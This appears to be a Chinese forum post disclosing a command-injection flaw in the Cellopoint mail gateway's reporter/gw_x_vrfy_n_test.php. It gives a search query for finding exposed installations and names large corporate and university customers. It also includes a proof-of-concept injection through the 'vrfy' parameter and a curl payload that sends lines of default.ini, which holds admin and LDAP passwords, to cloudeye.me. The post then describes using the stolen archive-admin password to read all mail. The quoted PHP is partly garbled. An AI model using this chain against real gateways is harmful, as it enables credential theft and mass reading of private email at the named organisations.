使用 http://cn.bing.com/search?q=cellopoint+reporter&go=Search&qs=ds&ajf=60&first=52&FORM=PORE 可以查看到诸多使用 cellopoint 邮件网关的大型企业。客户包括:国美集团东软集团松下电器有限公司清华大学上海交通大学逢甲大学 VIP ABC 仁宝计算机股份有限公司富士康国际控股有限公司上海机场(集团)有限公司丰田汽车(中国)投资有限公司广州滚石移动网络有限公司麦网电子商务(上海)有限公司快特电波科技有限公司东方花旗证券有限公司金元证券股份有限公司华鑫证券责任有限公司湘财证券有限责任公司中海基金管理有限公司天平汽车保险股份有限公司。
zend 解密后检视发现 reporter 目录下的 gw_x_vrfy_n_test.php 文件存在一处命令执行:
email = GET["email"];
vrfy = _GET["vrfy"];
file = (isset(_GET["file"]) ? _GET["file"] : ini_default);
$debugFile = "/tmp/vrfy-test.err";
cmd = GLOBALS["TopFileRoot"] . "smtpd/celloauth -v " . . " -n vrfy -d 2> debugFile";
exec(cmd, output, $ret);
lines = @file(debugFile);
URL 内构造 POC:;vrfy=;$cmd;的方式可以利用该漏洞执行命令(nobody 权限)。排查发现/usr/local/mozart/smtpd/default.ini 文件保存各项邮件管理员、ldap 等账户密码信息。构造以下 sed 命令(通过 sed 命令读取目标文件单行内容):
;curl%20-k%20https://cloudeye.me/?info=$(sed%20-n%20§3§p%20/usr/local/mozart/smtpd/default.ini);,
通过查阅远端服务器(例如 cloudeye.me)的 web 日志信息,回显获取到 default.ini 文件内容,得到邮件归档管理员口令,访问 $ip/report/login.php 登陆查阅全部邮件内容。
欢迎来到这里!
我们正在构建一个小众社区,大家在这里相互信任,以平等 • 自由 • 奔放的价值观进行分享交流。最终,希望大家能够找到与自己志同道合的伙伴,共同成长。
注册 关于